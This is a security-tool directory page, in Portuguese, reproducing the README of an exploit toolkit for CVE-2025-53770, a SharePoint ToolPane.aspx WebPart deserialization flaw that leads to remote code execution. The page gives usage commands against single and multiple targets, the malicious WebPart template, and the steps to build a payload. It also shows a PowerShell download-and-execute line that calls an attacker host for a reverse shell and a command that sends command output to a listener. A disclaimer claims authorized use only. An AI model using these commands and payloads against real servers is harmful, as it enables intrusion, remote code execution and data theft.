Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-53770-Exploit — Ferramenta de Exploit de Injeção de WebPart do SharePoint | Kitploit
Ferramentas/GitHubGitHub/soltanali0/cve-2025-53770-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed TeamingDesenvolvimento de Payloads
GitHubsoltanali0/cve-2025-53770-exploit

CVE-2025-53770-Exploit

Ferramenta de Exploit de Injeção de WebPart do SharePoint

Ver Repositório
313773há 9 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

📌 Toolkit de Exploit de Injeção de WebPart no SharePoint

🍕 Ferramenta de exploit para injeção de WebPart no SharePoint via ToolPane.aspx, levando à desserialização .NET e potencial execução remota de código (RCE).

Desenvolvido por: @GOTOCVE


🌍 Visão Geral

Esta ferramenta explora uma vulnerabilidade no Microsoft SharePoint (on-premises) que permite a usuários autenticados abusar do endpoint ToolPane.aspx e injetar WebParts maliciosas contendo objetos .NET serializados e compactados com GZIP.

O objeto injetado é colocado dentro do parâmetro MSOTlPn_SelectedWpId e incorporado em uma WebPart falsa (como <Scorecard:ExcelDataSet>) que é analisada e desserializada pelo backend do SharePoint.


⚙️ Recursos

  • ✅ Validação automática do endpoint (ToolPane.aspx)
  • ✅ Injeção de payloads fornecidos pelo usuário (objetos .NET LosFormatter codificados em GZIP+Base64)
  • ✅ Suporte a proxy para Burp/ZAP
  • ✅ Suporte para entrada de payload via arquivo ou direta

🧪 Versões Suportadas

ProdutoVersões Afetadas
SharePoint Server 201616.0.4351.1000 - 16.0.5508.1000
SharePoint Server 201916.0.10337.12109 - 16.0.10417.20027

⚡ Resumo da Vulnerabilidade

CampoValor
ComponenteMicrosoft SharePoint (On-Premises)
Endpoint/layouts/15/ToolPane.aspx
ParâmetroMSOTlPn_DWP
WebPart<Scorecard:ExcelDataSet CompressedDataTable>
ProblemaDesserialização .NET insegura
CVECVE-2025-53770

🧰 Componentes do Toolkit

✅ 1. exploit.py

Ferramenta de exploit multi-thread para SharePoint visando CVE-2025-53770.

  • Detecta o SharePoint + versão
  • Verifica o acesso a /ToolPane.aspx
  • Envia payload de WebPart maliciosa

✅ 2. YSLosf.exe

Gerador de Payload e Desserializador LosFormatter.

imagem

🚀 Uso

🔸 Uso Básico

root@kitploit:~
python3 exploit.py -u https://target -p payload.txt

🔸 Múltiplos Alvos

root@kitploit:~
python3 exploit.py -f targets.txt -p payload.txt --proxy http://127.0.0.1:8080

🔸 Todos os Argumentos

ArgumentoDescrição
-uURL do alvo (ex.: https://sp.company.local)
-fArquivo contendo URLs de alvos (uma por linha)
-pArquivo de payload ou string GZIP Base64 direta
--proxyProxy opcional (ex.: http://127.0.0.1:8080)
-tTimeout em segundos (padrão: 15)

🔧 Requisitos

  • Python 3.10
  • Instale as dependências:
root@kitploit:~
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
  • Runtime .NET 4.8 (para executar YSLosf.exe)

💥 Estrutura do Payload

Seu payload deve ser:

  1. Um objeto .NET (ex.: DataSet, ObjectDataProvider)
  2. Serializado usando LosFormatter ou BinaryFormatter
  3. Codificado em Base64
  4. Compactado com GZIP

Incorporado em uma WebPart como:

root@kitploit:~
<asp:UpdateProgress ID="UpdateProgress1" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="{PAYLOAD}" DataTable-CaseSensitive="false" runat="server" />
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>

🛠 Gerando Payloads com YSLosf

Passo 1: Criar o Arquivo de Payload

Coloque seu comando (ex.: reverse shell) em payload.txt:

root@kitploit:~
powershell -nop -c iwr http://attacker/shell.ps1 | iex

Passo 2: Gerar o Payload Base64

root@kitploit:~
C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe --p payload.txt
Serialized string:
/wEFBWZsdG1j

Base64 encoded:
L3dFRkJXWnNkRzFq

C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe -d dpayload.txt
Deserialized object:
fltmc

Passo 3: Compactar e Finalizar

root@kitploit:~
# compress.py
import gzip, base64

with open("base64.txt", "rb") as f:
    b64 = base64.b64decode(f.read())
    gz = gzip.compress(b64)
    # print(base64.b64encode(gz).decode())
    encoded = base64.b64encode(gz).decode()

with open("payload-final.txt", "w") as out_file:
    out_file.write(encoded)

Salve a saída em payload-final.txt e passe-a para a ferramenta de exploit.


🧵 Cadeias de Gadget Suportadas

  • System.Data.DataSet
  • System.Data.Services.Internal.ExpandedWrapper
  • System.Windows.Data.ObjectDataProvider
  • System.Web.UI.LosFormatter

📡 Notas sobre a Saída de Comandos

Esta vulnerabilidade não retorna saída (ex.: ipconfig) na resposta. Você deve:

  • Usar payloads de reverse shell
  • Ou exfiltrar a saída:
root@kitploit:~
powershell -c "ipconfig | Invoke-WebRequest -Uri http://your-ip:8000/?d=$(Get-Content -Raw)"

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança educacionais e autorizados.

Não use contra sistemas sem permissão explícita. O uso indevido pode ser ilegal e antiético.


🔍 Detecção

Se um servidor vulnerável aceitar o payload e refletir MSOTlPn_SelectedWpId ou renderizar a página com a WebPart injetada, é provável que seja explorável. Nenhuma saída significa que a desserialização falhou ou que o servidor foi corrigido.


🛑 Esclarecimento Legal e Escopo desta Ferramenta

Esta ferramenta não entrega nem executa shellcode ou web shell. Ela apenas demonstra a exploração da vulnerabilidade de desserialização .NET (CVE-2025-53770) por meio do endpoint vulnerável ToolPane.aspx, usando uma estrutura de WebPart maliciosa contendo um objeto .NET compactado com GZIP.

🔹 Propósito: ajudar pesquisadores, red teamers e defensores a detectar servidores SharePoint vulneráveis e testar o vetor de injeção com segurança usando payloads personalizados.

🔹 Payloads: a ferramenta exige que os usuários gerem seus próprios payloads (ex.: usando YSLosf.exe), que são incorporados na WebPart como strings GZIP codificadas em Base64.
É responsabilidade do usuário escolher payloads apropriados e éticos (como execução inofensiva de calc.exe, marcadores de beacon, etc.).

🔹 NENHUM Reverse Shell/Web Shell incluído:
Embora atacantes na vida real possam implantar web shells como spinstall0.aspx, este projeto não inclui nenhuma lógica desse tipo.
Se você planeja entregar um reverse shell, deve gerar seu próprio payload manualmente e assumir total responsabilidade pelo seu uso.

Histórico de Estrelas

Star History Chart

📢 Mais Exploits e CVEs?

Junte-se a @GOTOCVE no Telegram:

  • 🔍 Análises semanais de CVEs
  • 🧠 Writeups aprofundados de exploits
  • 🛡 Conteúdo de Red & Blue Team
  • 💣 PoCs reais e dicas de detecção

📬 Contato

Criado por Ali Soltani
Para consultas de pesquisa ou relatos de bugs, envie mensagem via Telegram

Baixar ferramenta